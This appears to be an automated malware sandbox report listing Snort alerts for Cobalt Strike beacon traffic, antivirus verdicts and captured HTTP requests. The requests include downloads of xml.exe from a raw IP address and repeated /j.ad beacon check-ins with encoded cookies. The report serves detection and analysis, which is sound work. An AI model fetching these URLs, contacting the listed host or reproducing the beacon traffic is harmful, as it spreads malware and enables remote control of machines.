      Timestamp:02/29/24-11:58:46.319962
      SID:2033713
      Source Port:49911
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:08.093915
      SID:2033713
      Source Port:49957
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:28.130203
      SID:2033713
      Source Port:49868
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:54.073989
      SID:2033713
      Source Port:49929
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:27.077436
      SID:2033713
      Source Port:49863
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:05.478066
      SID:2033713
      Source Port:49952
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:02.344835
      SID:2033713
      Source Port:49946
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:42.133072
      SID:2033713
      Source Port:49900
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:41.083259
      SID:2033713
      Source Port:49898
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:23.977505
      SID:2033713
      Source Port:49857
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:35.903974
      SID:2033713
      Source Port:49887
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:48.908135
      SID:2033713
      Source Port:49918
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:00.275464
      SID:2033713
      Source Port:49941
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:16.977287
      SID:2033713
      Source Port:49976
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:51.496149
      SID:2033713
      Source Port:49924
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:38.996380
      SID:2033713
      Source Port:49893
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:57.192290
      SID:2033713
      Source Port:49935
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:19.347756
      SID:2033713
      Source Port:49846
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:54.600597
      SID:2033713
      Source Port:49930
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: http://213.109.202.222/download/xml.xmlAvira URL Cloud: detection malicious, Label: malware
      Source: http://213.109.202.222/download/xml.exeAvira URL Cloud: Label: malware
      Source: C:\Users\user\Downloads\857bae32-9da1-41f6-909a-b81fa10c92f3.tmpAvira: detection malicious, Label: HEUR/AGEN.1315826
      Source: C:\Users\user\Downloads\857bae32-9da1-41f6-909a-b81fa10c92f3.tmpAvira: detection malicious, Label: HEUR/AGEN.1315826
      Source: C:\Users\user\Downloads\857bae32-9da1-41f6-909a-b81fa10c92f3.tmpAvira: detection malicious, Label: HEUR/AGEN.1315826
      Source: http://213.109.202.222/download/xml.exeVirustotal: Detection: 19%Perma Link
      Source: http://213.109.202.222/j.adVirustotal: Detection: 9%Perma Link
      Source: :sel (copy)ReversingLabs: Detection: 75%
      Source: :sel (copy)Virustotal: Detection: 68%Perma Link
      Source: http://213.109.202.222/download/xml.xmlVirustotal: Detection: 10%Perma Link
      Source: file:///C:/Users/user/Downloads/xml.xmlHTTP Parser: No favicon
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.17:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.17:49758 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49824 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.126.24.148:443 -> 192.168.2.17:49828 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49866 version: TLS 1.2
      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

      Networking

      barindex
      Source: TrafficSnort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.17:49825 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49837 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49838 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49839 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49840 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49842 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49843 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49844 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49845 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49846 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49847 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49848 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49849 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49850 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49851 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49853 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49854 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49855 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49857 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49858 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49859 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49860 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49861 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49862 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49863 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49865 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49868 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49869 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49870 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49871 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49872 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49873 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49875 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49876 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49877 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49878 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49879 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49880 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49882 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49884 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49886 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49887 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49888 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49889 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49890 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49891 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49892 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49893 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49894 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49895 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49897 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49898 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49899 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49900 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49901 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49902 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49906 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49907 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49908 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49909 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49910 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49911 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49912 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49913 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49914 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49915 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49918 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49919 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49920 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49921 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49923 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49924 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49925 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49926 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49927 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49928 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49929 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49930 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49931 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49932 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49933 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49934 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49935 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49936 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49937 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49938 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49939 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49940 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49941 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49942 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49944 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49945 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49946 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49947 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49948 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49949 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49950 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49951 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49952 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49953 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49954 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49955 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49956 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49957 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49958 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49959 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49960 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49961 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49962 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49963 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49964 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49965 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49966 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49967 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49968 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49969 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49972 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49973 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49974 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49975 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49976 -> 213.109.202.222:80
      Source: TrafficSnort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49977 -> 213.109.202.222:80
      Source: C:\Windows\System32\notepad.exeNetwork Connect: 213.109.202.222 80
      Source: unknownTCP traffic detected without corresponding DNS query: 184.30.122.249
      Source: unknownTCP traffic detected without corresponding DNS query: 184.30.122.249
      Source: unknownTCP traffic detected without corresponding DNS query: 23.206.222.123
      Source: unknownTCP traffic detected without corresponding DNS query: 23.206.222.123
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 213.109.202.222
      Source: unknownTCP traffic detected without corresponding DNS query: 213.109.202.222
      Source: unknownTCP traffic detected without corresponding DNS query: 213.109.202.222
      Source: unknownTCP traffic detected without corresponding DNS query: 213.109.202.222
      Source: unknownTCP traffic detected without corresponding DNS query: 213.109.202.222
      Source: unknownTCP traffic detected without corresponding DNS query: 213.109.202.222
      Source: unknownTCP traffic detected without corresponding DNS query: 213.109.202.222
      Source: unknownTCP traffic detected without corresponding DNS query: 213.109.202.222
      Source: unknownTCP traffic detected without corresponding DNS query: 213.109.202.222
      Source: unknownTCP traffic detected without corresponding DNS query: 213.109.202.222
      Source: unknownTCP traffic detected without corresponding DNS query: 213.109.202.222
      Source: unknownTCP traffic detected without corresponding DNS query: 213.109.202.222
      Source: unknownTCP traffic detected without corresponding DNS query: 213.109.202.222
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
      Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
      Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
      Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
      Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
      Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
      Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
      Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
      Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
      Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
      Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
      Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
      Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\C
      Source: global trafficHTTP traffic detected: GET /download/xml.xml HTTP/1.1Host: 213.109.202.222Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /download/xml.exe HTTP/1.1Host: 213.109.202.222Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
